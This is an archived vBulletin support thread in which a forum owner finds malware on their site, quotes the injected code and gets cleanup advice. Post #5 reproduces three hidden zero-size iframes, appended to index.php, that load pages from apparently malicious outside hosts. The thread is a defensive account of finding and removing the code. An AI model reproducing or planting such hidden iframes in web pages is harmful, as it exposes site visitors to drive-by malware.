The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
#1
|
|||
|
|||
Malware ... but where?!.. AHHHH!
I think the title shows all. My forum, http://www.adminfuel.com, gives the error that some sort of malware is present. However, I cannot find anything to do with this. Are there certain areas I should check?
Thanks |
#2
|
|||
|
|||
Let me install my AV and i'll tell you. Lol
|
#3
|
|||
|
|||
Haha.. thanks
|
#4
|
|||
|
|||
No problem, but one thing I'd suggest, check your index.php and global.php files. If there's something there at the top besides /*=========*\||vbstuff||etc.. then delete it.
|
#5
|
|||
|
|||
Thanks, I had a look, and there was nothing there BUT I had a look at the end of the index.php file and I found an iframe after the PHP tag closes:
<iframe src="http://google-stat.com/tomi/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odmarco.com/tomi/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odmarco.com/arwe/?736361acd09ca9717c9462514beb5205" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe> I have removed this, that the right thing? |
#6
|
|||
|
|||
That wouldn't do anything anyways. print_output() on that last eval() code disables any further code to be printed.
First of all, I'd suggest you upgrade to at least 3.8.3. I do not see any suspicious code besides that one in the source, but in Firefox, your style is broken due to the "Reported Attack Site" window. I had to switch to IE8 for viewing your site. Even in IE8, it doesn't show up. I also used w3 validator. |
#7
|
|||
|
|||
Been on holiday so couldn't update. Doing now, bit annoying with the error, but I am submitting to Google to recheck.
|
#8
|
|||
|
|||
rockinaway, at this point I'd have to suggest this:
For security reasons, I'd contact your hosting provider. (Which, according to Google, is Dreamhost?) You should contact them and request that they do a security audit on the server you're located on. You should change your passwords to something more secure. (eg: cv%3m2Fwe!@#.RE - but note that you'll need to remember the password [clearly, lol]) You should run the vBulletin "Suspect File Versions" script via the administrator control panel. To do this, go to: Admin CP > Maintenance > Diagnostics > Suspect File Version Once that has been completed, if you could screenshot the page (or in firefox, use Screengrab and save/upload the entire frame) I'd try and tell you what to look for. |
#9
|
|||
|
|||
I am on 3.8.1 now, if I want to update to the latest 3.8.4, which security patch would I download? I can't figure it out, haha... forgotten everything.
Before, I noticed a strange address appear when page loads, but now I don't see that. I wiill still contact my hosting provider. |
#10
|
|||
|
|||
Just download vBulletin as if you were downloading a new install. vBulletin Members Area - across from the same license for the board you're attempting to upgrade is a "Download vBulletin" and "Download ImpEx" link. The vB one is the one you want to click
Even so, contacting your host and making sure there were no exploited services, up-to-date software, etc is all running fine, then it could be determined to a XSS flaw of some sort, or php script that is on the server. |
|
|
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
More Information | |
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|